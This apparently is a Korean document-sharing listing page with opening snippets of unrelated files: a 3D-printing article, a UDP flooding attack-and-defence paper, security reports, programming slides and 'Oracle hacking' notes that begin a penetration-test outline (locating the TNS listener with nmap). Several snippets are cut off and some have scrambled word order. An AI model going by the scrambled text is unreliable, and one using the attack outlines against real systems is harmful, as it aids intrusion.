Art & Technology #5: 3D 프린팅 - Art World | 현대자동차

Art & Technology #5: 3D 프린팅 - Art World | 현대자동차 Art & Technology #5: 3D 프린팅 새로운 기술, 새로운 가능성 미래를 바꿔놓을 기술 이 무엇인 것 같으냐고 묻는다면 어떻게 대답해야 할까요? 답은 한 마치 한 쌍(pair)과도 같은 3D 스캐닝-프린팅 산업이 빠른 속도로 진화하고 있는 이유입니 가지는 아닐 것이나 그 대표적인 기술로 3D 스캐닝 과 3D 프린팅 을 들 수 있을 것입니 다. 카메라의

More information

UDP Flooding Attack 공격과 방어

UDP Flooding Attack 공격과 방어 황 교 국 (fullc0de@gmail.com) SK Infosec Co., Inc MSS Biz. Security Center Table of Contents 1. 소개...3 2. 공격 관련 Protocols Overview...3 2.1. UDP Protocol...3 2.2. ICMP Protocol...4 3. UDP Flood Test Environment...5

More information

월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호

월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호 안랩 온라인 보안 매거진 2016. 03 Patch Management System 월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호 법령 사항

More information

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2 월간악성코드은닉사이트탐지 동향보고서 (1 월 ) 2015. 02. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 3 2.1 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP10 4 - 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황

More information

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx #include int main(void) { int num; printf( Please enter an integer "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 을 작성하면서 C 프로그램의

More information

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

개인정보보호의  이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호- 개인정보보호의 이해및안전한관리 - 개인 PC 및스마트폰개인정보보호 - 2012. 12. 12 최윤형 ( 한국정보화진흥원 ) 1 안전한개인 PC 관리방법 목 차 2 안전한스마트폰관리방법 1. 안전한개인 PC 관리방법 정보통신기기의보안위협요인 웜, 바이러스, 악성코드, DDos 공격침입, 네트워크공격 휴대성, 이동성오픈플랫폼 3G, WiFi, Wibro 등 웜,

More information

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드] Google Map View 구현 학습목표 교육목표 Google Map View 구현 Google Map 지원 Emulator 생성 Google Map API Key 위도 / 경도구하기 위도 / 경도에따른 Google Map View 구현 Zoom Controller 구현 Google Map View (1) () Google g Map View 기능 Google

More information

Web Scraper in 30 Minutes 강철

Web Scraper in 30 Minutes 강철 Web Scraper in 30 Minutes 강철 발표자 소개 KAIST 전산학과 2015년부터 G사에서 일합니다. 에서 대한민국 정치의 모든 것을 개발하고 있습니다. 목표 웹 스크래퍼를 프레임웍 없이 처음부터 작성해 본다. 목표 웹 스크래퍼를 프레임웍 없이 처음부터 작성해 본다. 스크래퍼/크롤러의 작동 원리를 이해한다. 목표

More information

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the

More information

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자 SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전

More information

ISP and CodeVisionAVR C Compiler.hwp

ISP and CodeVisionAVR C Compiler.hwp USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler http://www.avrmall.com/ November 12, 2007 Copyright (c) 2003-2008 All Rights Reserved. USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler

More information